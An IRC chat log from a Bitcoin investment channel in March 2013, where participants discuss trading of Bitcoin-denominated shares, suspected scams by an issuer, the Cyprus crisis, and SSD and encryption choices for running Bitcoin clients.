August 2013." Mar 20 06:47:54 lolol Mar 20 06:48:01 mircea_popescu: sure, we are. Just no one investing in Usagi related stuff. Mar 20 06:48:52 pigeons o.o Mar 20 06:49:02 Ukto is he in breach ? Mar 20 06:50:32 should we chip in and pool the 0.1401 for lieftime access to his books? Mar 20 06:50:58 pigeons you have an account and the interest to bother ? Mar 20 06:51:38 sure Mar 20 06:52:04 1BjGr16hjmAKEmCAstswX6m55WDVnTPjHB Mar 20 06:54:06 ok guys we're getting a report, this better be humorous Mar 20 06:54:36 [MPEX] [S.MPOE] 1422 @ 0.00074197 = 1.0551 BTC [-] Mar 20 06:54:37 [MPEX] [S.MPOE] 3252 @ 0.00072858 = 2.3693 BTC [-] Mar 20 06:55:22 ;;goxlag Mar 20 06:55:22 0 seconds Mar 20 06:55:24 ;;ticker Mar 20 06:55:25 BTCUSD ticker | Best bid: 59.75001, Best ask: 59.88000, Bid-ask spread: 0.12999, Last trade: 59.70002, 24 hour volume: 104259.81722566, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 56.75246 Mar 20 07:14:32 pigeons need more funds? id like to see what you find as well Mar 20 07:14:53 no its courtesy mircea_popescu Mar 20 07:15:13 thanks mp Mar 20 07:15:16 sure Mar 20 07:15:28 i hope the knowledge is shared:) Mar 20 07:15:38 such as it is. Mar 20 07:15:38 I wouldn’t mind more funds. Mar 20 07:15:39 knowledge/lulz Mar 20 07:15:43 For BTC-BOND Mar 20 07:15:59 Too many people cashing out. Mar 20 07:16:25 It’s a pain to service. Mar 20 07:16:36 yeah, i dont like lending out money... wife twisted my arm to lend $400 to one of her friends for 2 weeks. im still pissed Mar 20 07:17:06 dont worry about your wife's friend, he's pay back Mar 20 07:17:10 *he'll Mar 20 07:17:40 not so worried about the money, it just changes things socially when you lend moeny to freinds Mar 20 07:17:55 or if he wont pay back, no friend, lol Mar 20 07:17:58 i have seen people turn on you for 100$ Mar 20 07:18:10 People are mad... Mar 20 07:18:17 this is thailand and this is like 1/2 a months wages maybe more Mar 20 07:18:30 they make 800 bucks am onth in thailand ?! Mar 20 07:18:31 no wai. Mar 20 07:18:48 i was joking, you're wife asked you to loan money to her friend a dude? Mar 20 07:18:50 the average wage here is $600 he gets paid more cuz he has a skill in demand Mar 20 07:19:08 is that skill a long yet thick penis ? Mar 20 07:19:13 pigeons they are a family, we are kinda close Mar 20 07:19:21 so much humor and so much scam, sometiems its hard to tell which is which Mar 20 07:19:22 ok Mar 20 07:19:34 no, i live in a good fruit growing region, and he is able and willing to work lopng hours to take care of the trees Mar 20 07:19:37 kakobrekla hence scammor Mar 20 07:19:44 hehe Mar 20 07:19:53 Chaang-Noi what fruits are those ? Mar 20 07:20:05 mangostean and durian mostly Mar 20 07:20:21 others too, but others dont need as much skills evidently Mar 20 07:20:54 mangostean is my fav fruit, durian is close to the my least fav Mar 20 07:21:03 hahaha i knew it Mar 20 07:21:08 ? Mar 20 07:21:11 mangosteen! where is lowtax! Mar 20 07:21:47 Chaang-Noi it's this perennial mockery @something bawful's history Mar 20 07:21:59 they were pushing some mangosteen scam thing a while back, much drama ensued Mar 20 07:22:08 lowtax live about a mile from me in the usa when we were growing up Mar 20 07:22:26 i dont know about that but its damn hard to get in the usa Mar 20 07:22:39 now its at the supermarkets Mar 20 07:22:42 its like $50 airshipped over night from thailand on amazin.com for like 7 fruit Mar 20 07:22:55 is it? impressive Mar 20 07:23:08 can they grow it in Fl? Mar 20 07:23:12 ah Mar 20 07:23:14 yeah Mar 20 07:23:15 so 60 is the new 50 eh ? Mar 20 07:23:21 nice, used to be illegal Mar 20 07:23:46 ah i see, googling Mar 20 07:23:49 well, we kinda blasted into and out of 50 with no stop... 60 might be the new 47.5 Mar 20 07:23:54 [BTCTC] [RSM] 1 @ 0.00575 BTC [+] Mar 20 07:24:14 i did hear tehy started to open up mangostean in the usa a few years ago, Mar 20 07:24:32 im glad to see it is in the usa, it is an awesome fruit Mar 20 07:25:05 looks yummy Mar 20 07:25:36 yeah, its like cotten candy but with a strong vit c taste Mar 20 07:25:49 good stuff, and its really vitiman packed Mar 20 07:26:06 Where’s the GUI MPEx client? Mar 20 07:26:18 oh right, nevermind... smickles.com Mar 20 07:26:23 kind of easy to remember Mar 20 07:26:30 :) Mar 20 07:27:00 [MPEX] [S.MPOE] 10328 @ 0.00072562 = 7.4942 BTC [-] Mar 20 07:27:35 yeah, good name huh Mar 20 07:28:00 not responding tho. He must be on a BitVPS vps... Mar 20 07:28:07 lol Mar 20 07:28:35 Seriously, our rented nodes have been giving us so much shit lately. We can’t wait to get everyone moved to our own servers. Mar 20 07:28:36 mp, are you an artist? Mar 20 07:28:39 yeah i dont see it either Mar 20 07:28:51 Chaang-Noi not in any conventional sense i don't think Mar 20 07:28:57 http://mirceapopescu.com/mirceapopescu.com_/drawing.html Mar 20 07:28:59 [BTCTC] [S.DICE-PT] 2 @ 0.00496 = 0.0099 BTC [+] Mar 20 07:29:06 that's some old dood. Mar 20 07:29:23 ahh, i half expected to see an SA site Mar 20 07:29:38 SA seems lazy these days Mar 20 07:30:00 not what it used to be in 2006 or w/e Mar 20 07:30:10 or 2001 Mar 20 07:30:21 god damn i feel old Mar 20 07:30:30 pretty much nobody left there, i mean past month or so i beebn asking friends i knew used to be huge sa buffs Mar 20 07:30:40 everyone's like "meh. haven't been there in X years" Mar 20 07:30:53 yeah like 11 or 12 for me Mar 20 07:31:10 and i was not there much, only cuz i new the core group in real life Mar 20 07:31:48 on 9-11 the got a photo of a guy on the towers with the airplane behing about to crash played on cnn Mar 20 07:32:01 clearly it was photos shopped but they showed it like 3 times, was fucking lol Mar 20 07:32:26 http://polimedia.us/dtng/c/src/136375753737.jpg big ass, tiny crack. Mar 20 07:33:01 http://images.search.yahoo.com/images/view;_ylt=A2KJke78SUlRN0QA0T6JzbkF;_ylu=X3oDMTBlMTQ4cGxyBHNlYwNzcgRzbGsDaW1n?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dphoto%2B9-11%2Bairplane%2Bcrash%2Bphotoshopped%2Btower%26n%3D30%26ei%3Dutf-8%26y%3DSearch%26fr%3Dsfp%26tab%3Dorganic%26ri%3D55&w=500&h=345&imgurl=farm4.staticflickr.com%2F3141%2F2843928473_44b84d75bd.jpg&rurl=http%3A%2F%2Fwww.flickr.com%2Fphotos%2F24345182%40N03%2F28439284 Mar 20 07:33:02 73%2F&size=83.4+KB&name=Recent+Photos+The+Commons+Getty+Collection+Galleries+World+Map+App+...&p=photo+9-11+airplane+crash+photoshopped+tower&oid=bd885a2e00be7a839184d95acdb7ea93&fr2=&fr=sfp&tt=Recent%2BPhotos%2BThe%2BCommons%2BGetty%2BCollection%2BGalleries%2BWorld%2BMap%2BApp%2B...&b=31&ni=220&no=55&ts=&tab=organic&sigr=11lsq5c30&sigb=14bcp79hb&sigi=11lt5ct6m&.crumb=xXUGtlVbO1d this one Mar 20 07:33:13 holy shit that link... Mar 20 07:34:28 Curious are ASICMINER shares (and passthroughs) traded anywhere other than btct.co, bitfunder and bitcointalk's forums? Mar 20 07:34:48 not rly. Mar 20 07:35:34 volume is really low.. is that this equity, or are most btc denominated equities low volume? Mar 20 07:35:52 bgupta s.dice saw > 10k btc on ipo day Mar 20 07:35:57 this was just mismanaged into the ground. Mar 20 07:36:14 well IPO is a bit different.. Mar 20 07:36:14 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Mar 20 07:36:15 actually, s.bbet saw more volume at launch than asicminer Mar 20 07:36:18 There was a S.DICE IPO? Mar 20 07:36:20 for now asicminer is one of the more active stocks Mar 20 07:36:22 bgupta: most are low, yeah s.dice s.mpoe are exceptions Mar 20 07:36:28 Namworld back in august Mar 20 07:36:30 there is a lot of volume you cant see cuz otc Mar 20 07:36:34 you dont remember the s.dice ipo? Mar 20 07:36:56 Chaang-Noi: otc as in irc otc? Mar 20 07:37:01 no Mar 20 07:37:08 ;;seen usagi Mar 20 07:37:08 usagi was last seen in #bitcoin-assets 1 day, 0 hours, 19 minutes, and 52 seconds ago: http://howestreet.com/2013/01/platinum-overtakes-gold-at-last/ Mar 20 07:37:14 as in people trading via pms with each other and fried cat Mar 20 07:37:23 Oh, sorry, I thought another block from owners were dumped or something Mar 20 07:37:25 i have traded 5000 shares alone in the last 2 weeks Mar 20 07:37:31 err, so how do they connect other than forums? Mar 20 07:37:45 find a guy who wants to sell, agree to price, tell friedcat Mar 20 07:37:52 bgupta one doesn't, mostly. it's jsut the empty chatter of whatever. Mar 20 07:37:59 ill sell for the right price, what are you qwilling to pay and how many? Mar 20 07:38:07 i've been promised shares to short for what, two weeks now. Mar 20 07:38:23 you never ask me mp, what terms do you have? Mar 20 07:38:51 something similar to last time i'd guess Mar 20 07:39:01 i dont know about last time Mar 20 07:39:13 you shorted it before? you must have lost massivly Mar 20 07:39:25 nah actually i made btc on that deal. Mar 20 07:39:45 shorting a stock that goes up 8005, still makes money, you are my new god:) Mar 20 07:39:48 anyway, 6 months, 1% per month over dividends paid, we'll have to lock it to an exchange as i don't deal in vapour Mar 20 07:39:48 800% Mar 20 07:40:00 what sort of volume can you push ? Mar 20 07:40:42 1% is not worth me locking it down for 6 months Mar 20 07:40:55 [MPEX] [S.MPOE] 1190 @ 0.00070626 = 0.8404 BTC [-] Mar 20 07:41:10 that is not worth the risk the exchange just might do a glbse Mar 20 07:41:32 but if you are holding the shares... Mar 20 07:41:35 i trust friedcat a lot, some of the exchanges, not as much Mar 20 07:41:44 then you're getting the same dividends but no % Mar 20 07:42:00 the operators are all here, which one don't you trust? Mar 20 07:42:10 what if it gets listed on the fan club? Mar 20 07:42:23 Chaang-Noi you can pick the venue for all i care. Mar 20 07:42:39 having the stocks stored with a 3rd party adds more risk, and i dont think that risk is worth the 1% i would get Mar 20 07:42:59 that's a sad indictment of the various exchanges i guess Mar 20 07:43:12 [BTCTC] [ASICMINER-PT] 2 @ 0.82 = 1.64 BTC [-] Mar 20 07:43:31 i understand mp, and i think some have less risk than others, but im going to pass. i think i can make more money buying and selling them. thanks for the offer however. Mar 20 07:43:44 1% is too low for anything in bitcoin right now Mar 20 07:43:45 anyway, bgupta, point in case. when i say "mismanaged into the ground" this is exactly what i mean. Mar 20 07:43:46 glbse did not last 100 months :) Mar 20 07:43:55 trade can't occur because asicminer doesn't have or understand financial management. Mar 20 07:44:30 trade is hard with asicminer, but most holders dont care as much, Mar 20 07:44:45 i was able to sell 5kshares and buy about 3k shares with little trouble Mar 20 07:44:59 friedcat has been very good about trades Mar 20 07:48:05 well thees a read Mar 20 07:48:05 https://bitcointalk.org/index.php?topic=155230.0 Mar 20 07:48:53 ;;ticker Mar 20 07:48:54 BTCUSD ticker | Best bid: 59.10000, Best ask: 59.29999, Bid-ask spread: 0.19999, Last trade: 59.29999, 24 hour volume: 104802.48103137, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 56.94039 Mar 20 07:49:19 uh Mar 20 07:49:28 bugpowder didn't say a word in here about it ?! Mar 20 07:50:50 "The only thing I ask is that, since this is a paid service, you not share the data in public (i.e. in a forum post) or something like that." Mar 20 07:51:47 oh and re: coinlab Mar 20 07:51:50 We'll have everyone moved over by March 22! Mar 20 07:51:55 riiight Mar 20 07:52:32 pigeons quote from ? Mar 20 07:53:47 the first one, a PM from usagi about the TU.SILVER books he is sending Mar 20 07:54:02 the second one from Vessenes Mar 20 07:54:25 March 21st, the first day of spring! Rebirth! Rejuvenation! Mar 20 07:54:35 they should make it april 1 Mar 20 07:54:51 TU.SILVER is that another underdocumented mess? Mar 20 07:55:06 :) Mar 20 07:55:33 messinprogress Mar 20 07:55:44 pigeons o but they will. Mar 20 07:57:00 [HAVELOCK] [HIM] 2 @ 1.99 = 3.98 BTC [-] Mar 20 07:58:35 TU.SILVER is overpriced. Anyone want to sell me some at the correct value? Mar 20 07:58:57 The one were price is more like value implied by silver held for it? Mar 20 07:59:20 that would also be overpriced, because it doesn't include the usagi factor Mar 20 07:59:24 totally. Mar 20 07:59:45 i'd sell an indefinite ammount of anything usagi makes at its nominal value. Mar 20 08:00:06 I don’t care. I got puts on it. I’d exercise them with my TU.SILVER Mar 20 08:00:29 can we send him silver and get shares? Mar 20 08:00:39 Maybe Mar 20 08:01:04 I love these new options. I can finally buy for a fraction shares rights to buy/sell something. Mar 20 08:01:10 Perfect when I expect price movements Mar 20 08:01:21 here's your 1.85 tons of silver. Mar 20 08:01:27 I CAN FINALLY SHORT WHAT I WANT! Mar 20 08:01:40 Namworld this will end in tears. Mar 20 08:01:42 Aren't the asks on TU.SIlver all showing a hefty premium over actual silver+shipping? Mar 20 08:01:52 yes Mar 20 08:01:55 BingoBoingo 82 dollars per oz Mar 20 08:01:59 vs 29 irl Mar 20 08:02:05 any bids? Mar 20 08:03:39 yes Mar 20 08:04:02 heh 1.5 btc worth of bids Mar 20 08:04:22 mircea: why? Mar 20 08:05:20 Namworld suppose i buy 1k worth of silver pseudoasset puts Mar 20 08:05:31 when its time to pay up, where does the btc come from ? Mar 20 08:05:42 It’s all reserved Mar 20 08:06:00 It must be deposited and put aside by Bitfunder. I trust Ukto, not the put seller Mar 20 08:06:08 so unless someone is willing to reserve a shitton of btc i can't buy my puts ? Mar 20 08:06:11 how's this an improvement ? Mar 20 08:06:40 You have to reserve enough BTC to fill the puts/calls when writing them. Mar 20 08:06:48 enough BTC or shares Mar 20 08:07:01 When you execute, it’s at strike on the option. Mar 20 08:07:22 so can i buy 1k puts on that thing atm ? Mar 20 08:07:35 No seller. Mar 20 08:07:41 of puts Mar 20 08:07:44 so then... no improvement. Mar 20 08:08:07 no, there is good puts/calls being placed. But they’re being bought. Mar 20 08:08:07 i thought from what you said there's actually liquidity in options mkt Mar 20 08:08:21 mircea_popescu I think you flipped it, silver is closer to $28/oz last I checed TU.silver had asks at 0.14BTC/Share for an ambiguous definition of share... Mar 20 08:08:32 BingoBoingo 1/10 of an oz Mar 20 08:08:33 It just got out. Not much liquidity yet. Mar 20 08:08:49 People will get around to use it more. Mar 20 08:10:37 ;;calc ([ticker --last] * 0.14 * 10) - 28.92 Mar 20 08:10:38 52.840042 Mar 20 08:10:46 ;;calc ([ticker --last] * 0.14 * 10) Mar 20 08:10:47 81.760042 Mar 20 08:10:55 Huge premium on those Mar 20 08:11:09 Way over their price Mar 20 08:12:03 mircea_popescu Do they sell silver that small or is there a swing people aren't showing... Coinabul shows 0.5 BTC for an once of silver... I think Usagi is awfully bullish or lubed numbers up to extract them from a convenient place Mar 20 08:12:52 let me get the discussion on forum Mar 20 08:12:55 it's funny at least Mar 20 08:13:12 https://bitcointalk.org/index.php?topic=137459.msg1641634#msg1641634 Mar 20 08:13:30 BingoBoingo: you can buy a pre 1964 us dime pretty much anywhere for $2.50 usd Mar 20 08:13:39 http://www.coinflation.com/coins/1946-1964-Silver-Roosevelt-Dime-Value.html Mar 20 08:14:01 BingoBoingo: usagi is special Mar 20 08:16:08 pigeons I might have noticed, the question seems to be how special... Mar 20 08:16:58 quite special Mar 20 08:17:58 mircea_popescu I do like how accessing his books costs a full share... Mar 20 08:18:19 we have the books on the way Mar 20 08:18:51 they were on his bitvps Mar 20 08:18:56 ya well... i do like how the price of exposing scams is going down Mar 20 08:18:59 harnett cost me 500 btc. Mar 20 08:19:25 Oooohhh... Mar 20 08:19:56 of course... in relative terms... 500 btc to blow a 50k+ scam Mar 20 08:20:04 vs .14 btc to blow a 5 btc scam... Mar 20 08:20:10 heh. i guess maybe im deluding myself. Mar 20 08:20:37 http://www.cyprusexpat.co.uk/blog/read/id:3160/germany-warns-cyprus-that-banks-may-never-open-again Mar 20 08:20:48 who was asking me earlier what's it mean for cyprus ? benkay ? Mar 20 08:20:56 banks never open again, omfg Mar 20 08:21:29 What happened every other time Germany got bullish on how to tell the rest of Europe how to do business? Mar 20 08:22:01 [MPEX] [S.MPOE] 1649 @ 0.00070739 = 1.1665 BTC [+] Mar 20 08:22:22 So. How about we roll out that latest version of the Earth? What’s it called? Ah yeah, Apocalypse. Mar 20 08:22:27 And get done with that Mar 20 08:24:19 BingoBoingo has nothing to do with germany tho Mar 20 08:24:21 I was just thinking Germany tried to tell people how to bank three times and then they started hiding behind Belgium... Mar 20 08:24:24 cyprus banks owe money. Mar 20 08:27:29 Sure mircea_popescu Cyprus banks owe money. Largely on Greek debt among other bad Euro debts. It is just Germany seems to like playing Euro enforcer now that everyone else has made them throw away the sharp objects Mar 20 08:36:32 [MPEX] [S.MPOE] 9191 @ 0.00070626 = 6.4912 BTC [-] Mar 20 08:36:34 [MPEX] [S.MPOE] 26 @ 0.00070542 = 0.0183 BTC [-] Mar 20 08:37:02 how can the euro last? Mar 20 08:37:34 it just seems so fucked up, these small nations just dont give a fuck cuz they are in so far into debt they are meh anyway Mar 20 08:37:42 euro investing in tu.silver Mar 20 08:38:31 oh, well then never mind:) Mar 20 08:39:51 euro is fucked Mar 20 08:40:37 if we don't get these tu.silver books maybe we can get a scammer tag Mar 20 08:41:59 [HAVELOCK] [HIM] 1 @ 1.99 BTC [-] Mar 20 08:42:30 if you paid for it, and he does not have them then yeah, seems about right Mar 20 08:46:17 what type of cpu chip would be best for "laoding block index" on a linux computer and doing so quickly Mar 20 08:46:36 checking old wallets for ltc/btc takes forever just to open Mar 20 08:49:36 Chaang-Noi: hrm Mar 20 08:49:38 ok no more rapidshare or megaupload where do i put a spreadsheet Mar 20 08:49:43 well, swithcing to bitcoin 0.8.0 helps a LOT there Mar 20 08:50:15 Chaang-Noi: but you'd be better off with a Bulldozer family CPU (any will do, even the new ones) Mar 20 08:50:52 Chaang-Noi: but bitcoin 0.8.0 checks chains in parallel with multiple threads, and it also uses a lot less disk IO to do it Mar 20 08:50:57 The best CPU for loading the block index now depends on what version of bitcoin-qt you are using Chaang-Noi Mar 20 08:51:04 Chaang-Noi: as for LTC, dunno what to tell you, they should just merge 0.8.0 changes in Mar 20 08:51:11 BingoBoingo: not really Mar 20 08:51:23 AMD has superior single threaded integer performance Mar 20 08:51:30 lets assume i use 0.8.2 or whatever the newest btc is Mar 20 08:51:52 Chaang-Noi: then you're already going as fast as you can Mar 20 08:51:59 Chaang-Noi: you're limited at disk io Mar 20 08:52:13 so SSD? Mar 20 08:52:17 yeah Mar 20 08:52:22 a high IOPS SSD would help Mar 20 08:52:28 btc wallets work well with SSD? Mar 20 08:52:30 it doens't need to have a lot of raw throughput Mar 20 08:52:37 The old 0.7.2+ would probably load fastest on an i7 because BDB doesn't parallelize well, 0.8.X and later on an AMD chip I imagine; an SSD makes a bigger bifference than any processor though Mar 20 08:52:39 SSDs work well with everything Mar 20 08:52:46 the whole writing to death thing has long since been a pile of bullshit Mar 20 08:52:47 i liketo use encrypted drives, and i know SSD sucks for encryption safety Mar 20 08:52:52 BingoBoingo: except thats wrong Mar 20 08:53:08 BingoBoingo: Bulldozers have four integer ALUs per core Mar 20 08:53:08 SSD is good with encryption if you start it encrypted Mar 20 08:53:24 Chaang-Noi: SSD works fine for encryption Mar 20 08:53:29 so when i load the OS just do full disk on a ssd and im fine? Mar 20 08:53:38 Chaang-Noi: the problem is it can't do automatic TRIM on its own Mar 20 08:53:40 sure Diable-D3, but BDB doesn't scale over multiple cores very well Mar 20 08:53:43 you NEED to use an OS that does TRIM Mar 20 08:53:49 BingoBoingo: I didnt say multiple cores. Mar 20 08:53:56 BingoBoingo: I said multiple ALU Mar 20 08:53:58 like mint 13? Mar 20 08:54:06 Chaang-Noi: any modern linux Mar 20 08:54:14 Chaang-Noi: or osx on apple blessed drives Mar 20 08:54:21 or windows 7 or newer Mar 20 08:54:29 Chaang-Noi: the filesystem on linux will be the problem though Mar 20 08:54:32 Anything past Debian 6.0 is fine for SSD encrypted Linux Mar 20 08:54:39 Chaang-Noi: you'll need to use ext4 Mar 20 08:54:53 Chaang-Noi: unless you shove btrfs on an encrypted lvm, which is kind of retarded Mar 20 08:55:13 and ZoL doesnt do encryption yet (and you need ubuntu to boot ZoL as well) Mar 20 08:55:27 oh lol what, i cant just used a standart install of mint 13 or 14? Mar 20 08:55:39 Chaang-Noi: depends entirely what mint uses by default Mar 20 08:55:56 Chaang-Noi: debian and ubuntu both can install ext4 to encrypted lvm at install time Mar 20 08:56:23 ok Mar 20 08:56:25 so I assume mint can as well Mar 20 08:56:42 ill get an ssd i guess, hell i might as well by a new laptop Mar 20 08:56:47 and the reason I say ext4 over ext3 is ext3 isn't optimized for TRIM Mar 20 08:57:00 Chaang-Noi: btw, OSX does support full encryption out of the box Mar 20 08:57:08 i dont do apple Mar 20 08:57:10 so if you're into getting a new laptop, mbp retinas arent so bad Mar 20 08:57:24 I dont do apple either, but I needed one for software dev reasons Mar 20 08:57:29 and I cant say I hate the hardware. Mar 20 08:57:33 ill get an asus unltra book with an i7 and the awesome screen Mar 20 08:57:52 with the ssd and windows 8, then nuke windows 8 Mar 20 08:58:16 BingoBoingo: anyhow, what I was saying is, its not that BDB doesn't do parallel thats the issue Mar 20 08:58:35 BingoBoingo: its that 0.7.x and earlier doesn't use threads to check the chain in parallel Mar 20 08:58:47 BingoBoingo: BDB is disk IO limited, not CPU limited Mar 20 08:59:00 you most likely wont peak on one core with BDB anyways Mar 20 08:59:20 0.8.0 introduced both leveldb and threaded chain checking Mar 20 08:59:34 so now it will happily saturate all cores IF your disk can keep up Mar 20 08:59:46 and leveldb rapes disk IO much less than bdb Mar 20 09:00:09 that said, if you're on a single threaded integer app, Bulldozers will win Mar 20 09:00:34 but it just doesn't matter, with bdb, your disk cant keep up Mar 20 09:02:14 Diablo-D3 the single integer ALU BDB will try to lock into probably won't keep up either... Mar 20 09:02:32 I'm not talking core in the marketing sense Mar 20 09:02:45 I'm talking core in the core sense Mar 20 09:02:52 bulldozers are two hardware thread cores Mar 20 09:03:03 they're 4x integer ALU + 2x FP ALU Mar 20 09:03:11 on strongly integer tasks, they're quite fast Mar 20 09:03:47 BDB tends to lock into the single smallest discrete uniti it can find to run it, BDB probably wont't use all of those cores Bulldozer is offering, but I would believe reputable benchmarks that say otherwise... Mar 20 09:05:20 For BDB core most often will mean it latches onto one interger computing unit and will force itself through that. Mar 20 09:05:43 BDB does this because it hates the idea of a future Mar 20 09:06:26 Unles built with many special compiler flags any parallelization it might experience will be accidental Mar 20 09:06:58 [MPEX] [S.MPOE] 1650 @ 0.00070542 = 1.1639 BTC [-] Mar 20 09:07:23 [BTCTC] [S.DICE-PT] 95 @ 0.00442 = 0.4199 BTC [-] Mar 20 09:07:27 [BTCTC] [S.DICE-PT] 290 @ 0.00441 = 1.2789 BTC [-] Mar 20 09:07:29 [BTCTC] [S.DICE-PT] 500 @ 0.0044 = 2.2 BTC [-] Mar 20 09:07:55 [BTCTC] [S.DICE-PT] 10 @ 0.004 = 0.04 BTC [-] Mar 20 09:07:56 [BTCTC] [S.DICE-PT] 1 @ 0.004 BTC [-] Mar 20 09:08:32 urgh... S.DICE not doing well enough in my taste. Mar 20 09:08:54 ok no offense to coinabul, but usagi is buying his silver from there, i would think those premiums are not really suited for an investment fan club Mar 20 09:09:50 also the buying JAH shares is wtf Mar 20 09:11:19 BingoBoingo: I think you didn't listen to what I said Mar 20 09:11:33 BingoBoingo: BDB nor bitcoin 0.7.x is multithreaded where it needs to be Mar 20 09:11:43 this is why instruction level parallelism is important Mar 20 09:12:00 but BDB uses so much disk IO to just read the db, that your CPU isn't the bottleneck Mar 20 09:12:49 http://bitbet.us/bet/11/mpex-listing-bonanza/ Mar 20 09:12:51 Lol wtf?? Mar 20 09:13:13 Depends on the disk, but I believe Goat aksed about the best processor... Bowjob I was one of the winners on that BitBet... Mar 20 09:13:46 huh Mar 20 09:15:43 Bowjob I was the bet from 1Magr on http://bitbet.us/bet/11/mpex-listing-bonanza/ so I won my fair weighted portion... Mar 20 09:15:46 BingoBoingo: goat asked how to get it to go faster Mar 20 09:15:56 yeah i want faster Mar 20 09:16:00 BingoBoingo:he was just mistaken that the cpu greatly factors in on this Mar 20 09:17:10 Ah, then yeah... Keep on a LevelDB version of maintain the blockchain on a fast SSD, one in a PCI-e slot for best performance. Mar 20 09:17:43 pci-e slot SSDs don't magically get more performance Mar 20 09:17:47 not for that cost, anyways Mar 20 09:18:15 Oh yeah, i did a tx today, it seemed quite fast Mar 20 09:18:36 and theres still problems with Linux support for some of them Mar 20 09:19:46 for ssd?? Mar 20 09:20:13 On PCI-e, but normal SATA is safe Mar 20 09:20:14 d3 can i buy any of the new asus ultrabooks and have it run mint14 fine? Mar 20 09:20:26 Chaang-Noi: we're talking about pci-e ones Mar 20 09:20:30 not SATA/SAS Mar 20 09:20:42 sata/sas ones are supported fine, they're normal devices Mar 20 09:20:50 ;;ticker Mar 20 09:20:50 BTCUSD ticker | Best bid: 58.55015, Best ask: 58.57000, Bid-ask spread: 0.01985, Last trade: 58.57000, 24 hour volume: 108368.69380536, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 57.15651 Mar 20 09:21:09 theres the correction Mar 20 09:21:14 4 bucks off of the ATH Mar 20 09:21:43 I hope we chill here for a bit.. kinda like calm before the shitstorm before moving into 70s Mar 20 09:22:32 ;;ticker Mar 20 09:22:32 BTCUSD ticker | Best bid: 58.50001, Best ask: 58.55014, Bid-ask spread: 0.05013, Last trade: 58.55014, 24 hour volume: 108233.45685213, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 57.16941 Mar 20 09:22:43 taht ath has some guy doing a market order with 500k usd... we are still above what he started buying at... Mar 20 09:23:10 vwap still under spot Mar 20 09:23:21 i hope hes a strong hand Mar 20 09:23:40 not some rich kids of instagram kid Mar 20 09:27:43 i still laugh every time i come acroos Mar 20 09:27:46 http://picturesofpeoplescanningqrcodes.tumblr.com/ Mar 20 09:30:34 [BTCTC] [BTC-BOND] 10 @ 0.009875 = 0.0988 BTC [-] Mar 20 09:30:50 [BTCTC] [BTC-BOND] 15 @ 0.009874 = 0.1481 BTC [-] Mar 20 09:31:08 [BTCTC] [PAJKA.BOND] 3 @ 0.105 = 0.315 BTC [+] Mar 20 09:32:32 oh, weve reached 65 on cavirtex Mar 20 09:32:35 pigeons: I don’t get it. Mar 20 09:32:43 Bowjob: Canadian? Mar 20 09:32:51 hrm Mar 20 09:32:53 No posts yet Mar 20 09:32:57 I think I might consider starting a SD competitor Mar 20 09:32:58 yeap Mar 20 09:32:58 hahaha Mar 20 09:33:24 i just look at cavirtex. too many fucking rules Mar 20 09:33:33 fees, limits, blah blah Mar 20 09:33:38 [BTCTC] [BTC-BOND] 35 @ 0.009874 = 0.3456 BTC [-] Mar 20 09:33:40 [BTCTC] [BTC-BOND] 10 @ 0.009873 = 0.0987 BTC [-] Mar 20 09:33:49 [BTCTC] [BTC-BOND] 6 @ 0.009842 = 0.0591 BTC [-] Mar 20 09:33:51 d3, ill pay you to make one for me in ltc :) Mar 20 09:33:55 I don’t like cavirtex much Mar 20 09:34:09 i want a simple exchange. transfer money -> buy btc, withraw Mar 20 09:34:22 [BTCTC] [PAJKA.BOND] 4 @ 0.105 = 0.42 BTC [+] Mar 20 09:34:38 the problem with SD is it doesn't do a huge pot Mar 20 09:34:52 [BTCTC] [BTC-BOND] 1 @ 0.009842 BTC [-] Mar 20 09:35:00 [BTCTC] [BTC-BOND] 1 @ 0.009842 BTC [-] Mar 20 09:35:07 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [+] Mar 20 09:35:10 those cypriots.. i assume they will deal in EUR Mar 20 09:35:18 so we might see the action in euro Mar 20 09:35:42 d3 we can do sd with ltc but have each one also have like 1 in a billion shot at 100k ltc :) Mar 20 09:36:02 yes but what about this Mar 20 09:36:07 every satoshi is a ticket Mar 20 09:36:29 yeah that is good Mar 20 09:36:42 so one jackpot Mar 20 09:36:53 and all the money that goes into the jackpot stays there except, say, 1% Mar 20 09:37:02 someones dumping Mar 20 09:37:08 oh you want to do that by itself, Mar 20 09:37:16 im watching the action on coinlab Mar 20 09:37:17 Chaang-Noi: yeah Mar 20 09:37:30 bowjob all day these spikes of sells, someone is dumping with out killing the market Mar 20 09:37:41 Chaang-Noi: have like a 1 in a trillion chance of winning Mar 20 09:37:46 :) Mar 20 09:38:47 the pot could go up to thousands of btc Mar 20 09:39:07 10k on average Mar 20 09:39:21 Namworld: er? Mar 20 09:40:23 Assuming one winner every 1 trillion, pot should reach an average of 10k BTC Mar 20 09:40:42 Namworld: I mean as in 1:1trillion per 1 BTC Mar 20 09:40:47 since every satoshi is an attempt Mar 20 09:40:58 I might not have the right magnitude Mar 20 09:41:03 it'll be out of a 512 bit space Mar 20 09:41:34 1 chance on a trillion per BTC? Mar 20 09:41:41 yeah Mar 20 09:41:47 We’ll run out of BTC... Mar 20 09:42:17 whats wrong with cavirtex? Mar 20 09:42:24 I'll even seed the pot with 100 BTC Mar 20 09:42:40 tiberiusiv: fees... fucking 3% for new accounts Mar 20 09:42:52 [BTCTC] [ASICMINER-PT] 10 @ 0.858995 = 8.59 BTC [+] Mar 20 09:42:57 You mean 1:1 trillion per satoshi... Mar 20 09:43:00 odds Mar 20 09:43:10 namworld: who do you use to cashout? Mar 20 09:43:12 no Mar 20 09:43:20 tiberiusiv: cavirtex Mar 20 09:43:24 usually Mar 20 09:43:24 Namworld: 1 satoshi would be one in 1:2^512th odds Mar 20 09:43:51 But... how do you determine the winner? Mar 20 09:43:59 [BTCTC] [ASICMINER-PT] 2 @ 0.859 = 1.718 BTC [+] Mar 20 09:44:07 the way the rest are Mar 20 09:44:09 You can’t have a 1:1 trillion chance to win for a BTC Mar 20 09:44:39 take txid, hash it, then take the first x bytes and see if its less than the taget Mar 20 09:44:39 *target Mar 20 09:45:13 so odds of winning is not 1:1 trillion Mar 20 09:45:20 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC 